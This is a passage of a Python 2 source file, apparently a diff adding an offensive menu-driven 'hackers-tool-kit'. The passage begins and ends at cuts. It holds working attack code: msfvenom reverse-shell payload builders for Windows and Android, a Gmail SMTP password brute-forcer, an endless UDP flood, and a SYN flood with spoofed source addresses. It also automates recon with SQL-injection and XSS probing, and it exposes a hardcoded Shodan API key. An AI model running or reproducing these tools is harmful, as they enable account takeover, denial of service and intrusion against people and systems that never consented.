hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,5) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better 